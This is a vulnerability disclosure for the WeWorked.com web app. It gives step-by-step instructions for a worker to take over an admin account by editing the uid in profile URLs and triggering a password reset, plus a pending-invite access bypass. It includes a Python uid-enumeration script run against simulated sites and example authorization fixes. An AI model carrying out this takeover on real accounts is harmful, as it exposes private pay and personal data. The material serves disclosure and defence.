Summary
Any person who is invited to a team is able to gain access to any other account on that team, because the profile page trusts the user ID (uid) passed in the URL. This includes admin accounts, so any invited person is able to see all user profile information on their team and change anything an admin can change.
Also, any user who is invited to a team is able to use the application while their status is still listed as a “pending invite”.
Specification
An admin does not expect that pay rates and other private information will be visible and editable by non-admins.
Steps required to access admin account
- Create an admin account on WeWorked.com (using the Try WeWorked for Free button).
- ℹ️ In some of our tests, this did NOT result in the necessary welcome (“Invitation”) email being sent.
- Login as admin and invite a person to your account.
- Do this here: https://weworked.com/app/manage.php?p=manage_users.php.
- Do NOT give this person administrator access.
- Log out as admin and, in a separate session, log in as the worker (setting the worker's password on the way in).
- As worker, access their own profile.
- Click “profile” on their main page.
- This is, for example: https://weworked.com/app/profile.php?uid=74858.
- As worker, decrement the uid in the URL and load the page.
- If this pulls up that same person's own profile again, continue to decrement and try again.
- This will eventually load the admin's profile page.
- As worker, edit admin profile email address and save.
- Logout as worker, access email to get change password email.
- ℹ️ In some of our tests, this did NOT send a change password email.
- ℹ️ I worked around this by instead changing the admin’s phone number and getting the “Reset Password” text.
- The worker can now log in as admin using the reset password.
- The worker can keep using the admin account without actually changing the temporary “reset” password.
- The worker is now able to change their own pay rate, delete other workers, and anything else the admin could do.
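The uid walk from the steps above, as an added example that is not part of the write-up or WeWorked's code. The endpoint shape (profile.php?uid=N) and the starting uid are taken from the steps; the `fetch` callback, the sample team and the two site models are constructed here so the script runs offline. A real fetcher would load the page with the worker's session cookie and parse the profile fields out of the HTML, and should only be pointed at a system you are authorised to test.

```python
"""IDOR walk over a numeric uid parameter (added example, not WeWorked code)."""
from typing import Callable, Optional

Profile = dict                                  # parsed fields of one profile page
Fetcher = Callable[[int], Optional[Profile]]    # uid -> profile, or None if the page did not load


def walk_profiles(own_uid, fetch, max_steps=500):
    """Decrement from own_uid and collect every profile that belongs to someone else.

    Mirrors the manual steps: some uids show the caller's own profile again,
    so a foreign profile is recognised by a different email, not by HTTP status.
    """
    own = fetch(own_uid)
    if own is None:
        raise ValueError("own profile did not load; is the session valid?")
    foreign = []
    lowest = max(own_uid - max_steps, 1)
    for uid in range(own_uid - 1, lowest - 1, -1):
        page = fetch(uid)
        if page is None or page.get("email") == own.get("email"):
            continue  # no such uid, or the site fell back to our own page
        foreign.append((uid, page))
    return foreign


def first_admin(foreign):
    """First (uid, profile) pair whose role is admin, or None."""
    return next(((uid, p) for uid, p in foreign if p.get("role") == "admin"), None)


# Constructed sample team (not real accounts). uid 74856 deliberately does not exist.
WORKER_UID = 74858
TEAM = {
    74855: {"email": "admin@example.com", "role": "admin", "pay_rate": "55.00"},
    74857: {"email": "other.worker@example.com", "role": "worker", "pay_rate": "22.00"},
    WORKER_UID: {"email": "worker@example.com", "role": "worker", "pay_rate": "20.00"},
}


def vulnerable_site(uid):
    """Models what the write-up observed: any team member's profile loads for any
    uid, and an unknown uid falls back to the caller's own page."""
    return TEAM.get(uid, TEAM[WORKER_UID])


def fixed_site(uid):
    """Ownership enforced: the worker's session only ever gets its own profile."""
    return TEAM[uid] if uid == WORKER_UID else None


if __name__ == "__main__":
    for name, site in (("vulnerable", vulnerable_site), ("fixed", fixed_site)):
        found = walk_profiles(WORKER_UID, site, max_steps=10)
        print(name, "foreign uids:", [uid for uid, _ in found], "admin:", first_admin(found))
```

Against the vulnerable model the walk reports both the other worker and the admin; against the fixed model it reports nothing, which is the behaviour the fix in the recommendations should produce.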
Steps to access account while remaining a “pending invite”
- Login as admin and invite a person to your account.
- Logout as admin and separately login as worker using the welcome email.
- This presents a “change your password” screen.
- Do NOT set a password on this screen. Instead directly go to the URL: https://weworked.com/app/profile.php and access the features of the WeWorked app.
- Logout as worker and login again as admin.
- Access https://weworked.com/app/manage.php?p=manage_users.php and find the worker below.
It is expected that this worker will be listed under “Active Users”, but instead they are under “Pending Invites”.
Other notes
- We believe the worker is NOT able to access any information from other teams’ accounts.
- The admin will notice that something is wrong when this attack happens, because their password (and the email address or phone number on their account) will have been changed.
- 👍 This does not stop the attack, but it makes it detectable, which is a defense-in-depth property.
Recommendations
- Only admins should be able to read or write privileged information on the user profile pages, because that is what we expect an “admin” to have access to.
- Example page: https://weworked.com/app/profile.php?p=profile_editworkinfo.php&uid=74862
- A normal user loading this page should see less, or have less edit permissions.
- When a user account password is changed this should trigger an email and/or SMS to that person. This could have alerted the admin in our above scenario.
- This website could add two-factor authentication. Depending on the implementation, this could have prevented the worker from gaining access to the admin account.
- At the beginning, the free signup did not generate a welcome email (but the admin invitation did). This should be fixed, because otherwise new potential customers will not be able to access their account.
- A new user should not be allowed to use WeWorked app features while they are still in “pending invite” status.
- Consider reviewing other endpoints (in particular other pages that take a uid parameter), because they may be vulnerable in the same way.
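One way to implement the profile-page recommendations above (admin-only privileged fields, and no app access while a user is still a pending invite, which is the state the second procedure demonstrates), as an added example that is not WeWorked's code. The user model, the field names, the split between admin-only and self-editable fields, and the sample users are assumptions made for this example; the uids reuse the numbers quoted in the write-up.

```python
"""Profile authorization check beside the observed behaviour (added example, not WeWorked code)."""
from dataclasses import dataclass
from enum import Enum


class Role(Enum):
    ADMIN = "admin"
    WORKER = "worker"


class Status(Enum):
    ACTIVE = "active"
    PENDING_INVITE = "pending_invite"   # invited, never completed the password screen


@dataclass
class User:
    uid: int
    team_id: int
    role: Role
    status: Status
    email: str
    display_name: str
    pay_rate: str


PRIVILEGED_FIELDS = {"pay_rate", "role"}          # admin-only, both read and write (assumed split)
SELF_EDITABLE_FIELDS = {"display_name", "email"}  # a user may change these on their own profile


def vulnerable_load_profile(users, requested_uid):
    """The behaviour described in the write-up: the uid from the query string is
    trusted and every field comes back, whoever is logged in."""
    return dict(vars(users[requested_uid]))


def check_access(session, target, action, field_name=None):
    """Raise PermissionError unless `session` may `action` ("read" or "write")
    `target`'s profile. For writes, `field_name` is the field being changed."""
    if session.status is not Status.ACTIVE:
        raise PermissionError("pending invites have no app access")
    if session.team_id != target.team_id:
        raise PermissionError("no cross-team access")
    if session.role is Role.ADMIN:
        return
    if session.uid != target.uid:
        raise PermissionError("workers may only open their own profile")
    if action == "write" and field_name not in SELF_EDITABLE_FIELDS:
        raise PermissionError(f"workers may not change {field_name}")


def load_profile(users, session_uid, requested_uid):
    """Hardened read: authorise first, then strip admin-only fields for non-admins."""
    session, target = users[session_uid], users[requested_uid]
    check_access(session, target, "read")
    data = dict(vars(target))
    if session.role is not Role.ADMIN:
        for name in PRIVILEGED_FIELDS:
            data.pop(name, None)
    return data


def update_profile(users, session_uid, requested_uid, changes):
    """Hardened write: every field is authorised before any is applied, so a
    request mixing allowed and forbidden fields changes nothing at all."""
    session, target = users[session_uid], users[requested_uid]
    for name in changes:
        check_access(session, target, "write", name)
    for name, value in changes.items():
        setattr(target, name, value)
    return dict(vars(target))


def denied(fn, *args):
    """True if the call is refused with PermissionError."""
    try:
        fn(*args)
    except PermissionError:
        return True
    return False


# Constructed sample accounts (not real data): one team with an admin, an active
# worker and a pending invitee, plus an admin of a different team.
USERS = {
    74855: User(74855, 1, Role.ADMIN, Status.ACTIVE, "admin@example.com", "Admin", "55.00"),
    74858: User(74858, 1, Role.WORKER, Status.ACTIVE, "worker@example.com", "Worker", "20.00"),
    74862: User(74862, 1, Role.WORKER, Status.PENDING_INVITE, "invitee@example.com", "Invitee", "18.00"),
    80001: User(80001, 2, Role.ADMIN, Status.ACTIVE, "other-team@example.com", "Other", "60.00"),
}

if __name__ == "__main__":
    print("vulnerable, worker asks for admin's page:", vulnerable_load_profile(USERS, 74855))
    print("hardened, worker's own page:", load_profile(USERS, 74858, 74858))
    print("hardened, worker asks for admin's page denied:", denied(load_profile, USERS, 74858, 74855))
    print("hardened, pending invitee denied:", denied(load_profile, USERS, 74862, 74862))
```

The point of `update_profile` checking every field before applying any is that the email change used in the takeover above cannot be smuggled in alongside a harmless field; the point of the status check coming first is that an invitee who skips the “change your password” screen is refused at every page, not just the one that happened to be tested.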
Tools used to discover bug
I used a stock Safari installation and accessed URLs that WeWorked shows you when you are creating an account from the “Try WeWorked for FREE” button.
Test date
May 2020
Disclosure schedule
- 2020-02-25 Discovery first sent to vendor
- 2020-02 through 2020-04 Sent 7 emails to vendor summarizing the issue
- 2020-04-14 Tweeted at the company to summarize the issue
- 2020-05-17 Wrote up and live streamed the discovery
- 2020-05-17 Posted to Privacy Log and notified vendor by email and Twitter
Acknowledgements
- Thank you to t012nad0 and definitelynotlisp for notes on recommended password best practices.
Comments
Please discuss this topic anywhere and let me know any great comments or media coverage I should link here.